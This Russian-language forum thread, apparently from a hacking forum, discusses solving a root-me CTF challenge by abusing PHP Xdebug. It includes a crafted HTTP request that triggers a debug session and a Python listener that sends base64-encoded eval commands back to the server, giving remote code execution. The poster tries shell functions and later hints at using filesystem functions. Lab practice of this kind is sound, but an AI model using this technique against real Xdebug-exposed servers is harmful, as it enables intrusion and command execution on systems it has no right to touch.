PDA

Просмотр полной версии : CTF root-me(php Xdebug)


tester_new
23.05.2020, 15:44
День добрый,

уже несколько часов не могу пройти данный таск(прошли его 1% пользователь):

http://challenge01.root-me.org/web-serveur/ch64/

Обновлю свой пост который так и не получил ответа)), значительно продвинулся в данном таске(по факту составил верный HTTP запрос и все...) уже получаю шел НО проблема в том что в php все 'интересные' функции отключены(может я ошибаюсь), вообщем кидаю ниже HTTP пакет который я отправляю посредством Burp(можно конечно использовать массу других утилит) на сервер и после чего мне успешно прилетает шел, но как я писал выше толку с данного шела мало...

Пакет:

GET /web-serveur/ch64/?XDEBUG_SESSION_START=phpstorm HTTP/1.1

Host: challenge01.root-me.org

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Forwarded-For:IP

HTTP_CLIENT_IP:IP

Upgrade-Insecure-Requests: 1))

Cookie: XDEBUG_SESSION_START=phpstorm

Content-Length: 2

Скрипт(listener) который получает коннект:


Code:
#!/usr/bin/python2
import socket

ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
client_data = conn.recv(1024)
print(client_data)
data = raw_input('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))


Пример как пытаюсь юзать:


Code:
Getting a connection from server and try to execute command:
511

>> system('pwd')
210

>> exec('pwd')
210

>> shell_exec('pwd')
210

>> escapeshellcmd('pwd')

tester_new
02.07.2020, 20:46
Победил,

подсказка: Юзайте функции php для работы с filesystem.

tester_new
25.11.2020, 22:03
plumbermon said:
↑ (https://antichat.live/posts/4431658/)
php разве не подругому пишется


Можно пример в студию правильного написания php?